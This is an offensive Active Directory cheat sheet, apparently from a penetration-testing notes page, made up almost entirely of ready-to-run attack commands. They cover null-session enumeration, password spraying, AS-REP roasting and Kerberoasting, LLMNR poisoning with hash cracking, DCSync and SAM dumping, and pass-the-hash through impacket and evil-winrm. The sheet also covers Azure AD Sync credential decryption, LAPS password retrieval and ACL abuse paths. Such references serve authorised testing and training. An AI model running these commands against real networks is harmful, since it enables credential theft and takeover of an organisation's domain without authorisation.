Active Directory
Here you will find a detailed CheatSheet for Active Directory
Enumeration and Exploitation
RPC Enumeration
# Login using a NULL Session with RPCClient
rpcclient -U "" -N <IP>
# (Authenticated) Login to RPC using RPCClient
rpcclient -U "<User>" <IP>
Password for [WORKGROUP\<User>]: <Pass>
# Commands ->
> enumdomusers # List domain users
> enumdomgroups # List domain groups
> queryuser <RID> # Info about a user (RID from enumdomusers)
> querygroup <RID> # Info about a group
> querygroupmem <RID> # Group membership
> getusername # Current session username
> getdompwinfo # Password policy
> getdomusers # Sometimes shows full list (legacy domains)
> srvinfo # System info (OS, domain, DC name, etc.)LDAP Enumeration
# Dump the information using an authenticated user
ldapdomain dump -u '<USER>\<DOMAIN>' -p '<PASS>' <IP>
# Enumerate every information accessible using a NULL Session
ldapsearch -x -H ldap://<IP> -b "dc=<domain>,dc=<domain>"
# Enumerate domain admins with WinDapSearch
python3 windapsearch.py --dc-ip <IP> -u <USER>@<DOMAIN> -p <PASS> --da
# Enumerate WinDapSearch Privileged users
python3 windapsearch.py --dc-ip <IP> -u <USER>@<DOMAIN> -p <USER> -PUKerberos Enumeration
# Enumerate users with kerbrute
kerbrute userenum -d offsec.local --dc <DC-IP> users.txt
# Password Spraying Via Kerberos
kerbrute passwordspray -d <domain> --dc <DC-IP> users.txt '<Password>'
# AS-Rep Roasting
impacket-GetNPUsers <domain>/ -no-pass -usersfile users.txt -format john
# Kerberoasting
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -requestSMB Enumeration
# User/Password spray over SMB
netexec smb <IP> -u users.txt -p '<PASSWORD>' --no-bruteforce
# List Shares without credentials
netexec smb <target> -u '' -p '' --shares
# List Shares with credentials
netexec smb <target> -u user -p pass --shares
# Extract users, sessions, groups (with creds)
netexec smb <DC-IP> -d <Domain> -u user -p pass --users / --groups / --sessions
# RID Brute (null session)
netexec smb <target> -u '' -p '' --rid-brute
# Dump SAM (if local admin)
netexec smb <target> -u user -p pass --sam
# Enumerating Password Policy (Authenticated)
netexec smb <target> -u user -p pass --pass-pol
# Enumerating overall with enum4linux
enum4linux-ng -P <IP>LLMNR/NBT-NS Poisoning — Linux
# Activate responder
sudo responder -I ens224
# Crack the NTLMv2 hash
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txtLLMNR/NBT-NS Poisoning — Windows
# Import Inveigh.ps1
Import-Module .\Inveigh.ps1
# Poison the interface
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
# Inveigh C# version (Inveigh Zero)
.\Inveigh.exeUser enumeration with Enum4linux
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"DCSync
# Must BeDomain Admin or have replication rights (e.g GenericAll)
impacket-secretsdump '<DOMAIN>/<USER>:<PASS>@<IP>'Pass-TheHash
# PTH With NetExec
netexec smb <target-ip> -u <user> -H <NTLM_hash>
# PTH With Impacket-WMExec
impacket-wmiexec -hashes :<NTLM_hash> <domain>/<user>@<target>
# PTH With Impacket-PSExec
impacket-psexec -hashes :<NTLM_hash> <domain>/<user>@<target>
# PTH With Impacket-SMBClient
impacket-smbclient -hashes :<NTLM_hash> <domain>/<user>@<target>
# PTH With Evil-WinRM
evil-winrm -i <ip> -u <user> -H <NTLM_hash>WinRM
# Authenticated login in WinRM
evil-winrm -i <IP> -u <user> -p <pass>
# Login with certificates
evil-winrm -i <IP> -c <cert.pem> -k <key.pem>Enumeration with BloodHound-python
bloodhound-python -u '<USER>' -p '<PASS>' -ns <IP> -d <DOMAIN> -c allEnumeration with BloodHound
# Run BloodHound dashboard
sudo bloodhound
# Upload SharpHound
sharphound
# Run SharpHound on the victim
.\SharpHound.exe -c All
# Download the .zip file and then upload it on the "Ingest" menu on the BH dashboardInternal password spraying — Windows
# Download the ps1 script
wget https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/refs/heads/master/DomainPasswordSpray.ps1
# Import the module
Import-Module .\DomainPasswordSpray.ps1
# Invoke the attack
Invoke-DomainPasswordSpray -Password <PASS> -OutFile spray_success -ErrorAction SilentlyContinuePrivilege Escalation
SeBackupPrivilege Abuse
# If user got
whoami /priv
...
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
# You can copy the SAM or the SYSTEM
> reg save hklm/sam C:\Temp\sam.hive
> reg save hklm/system C:\Temp\system.hive
# And exploiting with impacket
impacket-secretsdump -sam sam.hive -system system.hive LOCAL Winpeas
# Download WinPEASx64.exe
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250701-bdcab634/winPEASx64.exe
# Execute it on the target
. .\WinPEASx64.exeMicrosoft Azure AD Sync
# Download AdDecrypt.zip
wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
# Upload it to the victim machine
*Evil-WinRM* PS C:\Temp> upload mcrypt.dll
*Evil-WinRM* PS C:\Temp> upload AdDecrypt.exe
# Move to the target directory
cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
# Execute the exploit
C:\Temp\AdDecrypt.exe -FullSQLEnumerating Security Controls
# Check Windows Defender Status
Get-MpComputerStatus
# Enumerate AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
# Enumerate Language Mode
$ExecutionContext.SessionState.LanguageMode
# Enumerating LAPS
Find-LAPSDelegatedGroups
# Check rights with LAPS enabled
Find-AdmPwdExtendedRights
# Search computers that have LAPS enabled
Get-LAPSComputersAuthenticated enumeration from powershell
# Discover modules
Get-Module
# Load AD module
Import-Module ActiveDirectory
# Get domain Info
Get-ADDomain
# Get user info
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Check Trust relationships
Get-ADTrust -Filter *
# Enumerate groups
Get-ADGroup -Filter * | select name
Get-ADGroup -Identity "Backup Operators"
# Enumerate group membership
Get-ADGroupMember -Identity "Backup Operators"PowerView commands
# Import PowerView.ps1 module
Import-Module .\PowerView.ps1
# Domain info
Get-Domain
Get-DomainController
# Users / Groups / Memberships
Get-DomainUser
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins"
# SPN / Kerberoasting
Get-DomainSPNTicket -username svc-account
# ACLs (Privilege escalation paths)
Find-InterestingDomainAcl
# Shares / Sessions / Local admins
Find-DomainShare
Get-NetSession -ComputerName target
Find-LocalAdminAccess
# Trusts
Get-DomainTrustMapping
Get-ForestTrust
# Convert user to SID
ConvertTo-SID -Name "user"
# Test if an user has administrative access
Test-AdminAccess -ComputerName <target>
# Kerberoasting - enumerate users
Get-DomainUser * -spn | select samaccountname
# Target the specific user and retrieve TGT
Get-DomainUser -Identity <user> | Get-DomainSPNTicket -Format john/hashcat
# Export all tickets to a CSV file
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat/John | Export-Csv .\hashes.csv -NoTypeInformationSnaffler
# Download from https://github.com/SnaffCon/Snaffler
# Execute Snaffler
.\Snaffler.exe -s -d <domain> -o snaffler.log -v dataBasic Enumeration Commands — Windows
# Print PC's name
hostname
# Print OS Version
[System.Environment]::OSVersion.Version
# Print patches and hotfixes applied to the host
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Display all list of environment variables
set
# Check the firewall
netsh advfirewall show allprofiles
# Check Windows defender
sc query windefend
# List all known hosts
arp -a
# Print the routing table
route print
# Enumerate host's security configuration
Get-MpComputerStatus | Select AMProductVersion
# Enumerate administrator accounts
Get-LocalGroupMember -Group "Administrators"
# List all domain users with their Enabled status and Description
Get-ADUser -Filter * -Properties Description, Enabled | Select SamAccountName, Enabled, DescriptionLAPS Abuse
# Clone the repository
git clone https://github.com/ztrhgf/LAPS/tree/master/AdmPwd.PS
# Import the module
Import-Module ./AdmPwd.PS.psd1
# Check what objects can manage LAPS
Find-AdmPwdExtendedRights -identity *
# Retrieve the password for a computer
get-admpwdpassword -computername <Computer name> | Select passwordACE Abuse
+------------------------+------------------------------------------------+-------------------------------------------------------------+
| Permission | Abused With | Enables Attack(s) |
+------------------------+------------------------------------------------+-------------------------------------------------------------+
| ForceChangePassword | Set-DomainUserPassword | Reset target user password |
| Add Members | Add-DomainGroupMember | Add user to privileged group |
| GenericAll | Set-DomainUserPassword / Add-DomainGroupMember | Full control (reset password, Kerberoasting, add to group) |
| GenericWrite | Set-DomainObject | Add SPN (Kerberoasting), add user to group, RBCD setup |
| WriteOwner | Set-DomainObjectOwner | Take ownership of object, escalate to full control |
| WriteDACL | Add-DomainObjectACL | Grant privileges (e.g. GenericAll) to another user |
| AllExtendedRights | Set-DomainUserPassword / Add-DomainGroupMember | Reset password or modify group membership |
| AddSelf | Add-DomainGroupMember | Add self to group with elevated rights |
+------------------------+------------------------------------------------+-------------------------------------------------------------+ACL Enumeration
# (Needs PowerView)
# Enumerate ACLs
Find-InterestingDomainAcl
# Get current user SID
$sid = Convert-NameToSid username
# Enumerate all ACLs where user has permissions in
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
# Create a list of domain users
Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
# Perform a reverse search to a GUID
$guid = <"guid">
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl
# Resolve GUID
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
# Further enumeration using a user
$sid2 = Convert-NameToSid <user>
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -VerboseACL Abuse
# (Needs PowerView)
# Create a PSCredential Object
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)
Last updated